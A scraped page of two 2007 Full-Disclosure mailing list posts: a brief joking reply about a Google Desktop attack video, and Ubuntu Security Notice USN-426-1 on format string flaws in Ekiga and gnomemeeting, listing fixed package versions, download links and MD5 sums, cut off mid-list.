Re: [Full-disclosure] Overtaking Google Desktop
On Thu, 22 Feb 2007, Steve Ragan wrote: Yea he uses it later in the video, you see him pull it up in the attack, and read it. One would assume it is fake. [lights dim, sinister accords play] ...OR IS IT? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-426-1] Ekiga vulnerabilities
=== Ubuntu Security Notice USN-426-1 February 22, 2007 ekiga, gnomemeeting vulnerabilities CVE-2007-1006, CVE-2007-1007 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: gnomemeeting 1.2.2-1ubuntu1.1 Ubuntu 6.06 LTS: ekiga2.0.1-0ubuntu6.1 Ubuntu 6.10: ekiga2.0.3-0ubuntu3.1 After a standard system upgrade you need to restart Ekiga to effect the necessary changes. Details follow: Mu Security discovered a format string vulnerability in Ekiga. If a user was running Ekiga and listening for incoming calls, a remote attacker could send a crafted call request, and execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1.diff.gz Size/MD5:12465 55f41497417828ebef140cc0670a25d6 http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1.dsc Size/MD5: 1811 63cc3478d280f09018f24ae55c3aa4ed http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2.orig.tar.gz Size/MD5: 6059950 65fe2d6a31e63a37c5a6217206223192 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_amd64.deb Size/MD5: 1826384 b3bfbd016a2e5fdd4f54ad639bef4e9b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_i386.deb Size/MD5: 1802170 3245abb98b202c2f6e7c27760723af5c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_powerpc.deb Size/MD5: 1817502 64236066ccb7f81fddb6728b158f0415 sparc architecture (Sun SPARC/UltraSPARC) 
http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.1_sparc.deb Size/MD5: 1803872 4ec0f28c58259ec9bf5aac2917a542f6 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1.diff.gz Size/MD5:23489 9c1a9e42584e604667c474b441390dce http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1.dsc Size/MD5: 2090 3eabad082fd143a10c5b3625db75562b http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1.orig.tar.gz Size/MD5: 5572709 9f0a2bcce380677e38b23991320df171 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_amd64.deb Size/MD5: 3687800 943691c7d2d27e7d3156b050772ddd04 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_i386.deb Size/MD5: 3658022 fd451db8ed71af0d0caae71b0e55e7ec powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_powerpc.deb Size/MD5: 3673764 423bf587f00be062ffaf7b9cd62487c4 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.1_sparc.deb Size/MD5: 3660784 b2ecd3a204168f67638000cd01c46a39 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1.diff.gz Size/MD5:23822 fc9d0688739586606dc67efa1662070f http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1.dsc Size/MD5: 1837 1da46e1bc9e1b820ee77cc32fc6c80d7 http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3.orig.tar.gz Size/MD5: 5749938 5ad3458d73d65c6502c312ff0c430a7c amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_amd64.deb Size/MD5: 3688744 d4d26c59a8a1e90a82ad72961f3ffae8 i386 architecture (x86 compatible Intel/AMD) 
http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_i386.deb Size/MD5: 3668392 a12654dfa595f8cf37f89bf9b644dd44 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_powerpc.deb Size/MD5: 3676188 e2df269899f919673f2a7b7da7f0c8d1 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.1_sparc.deb Size/MD5: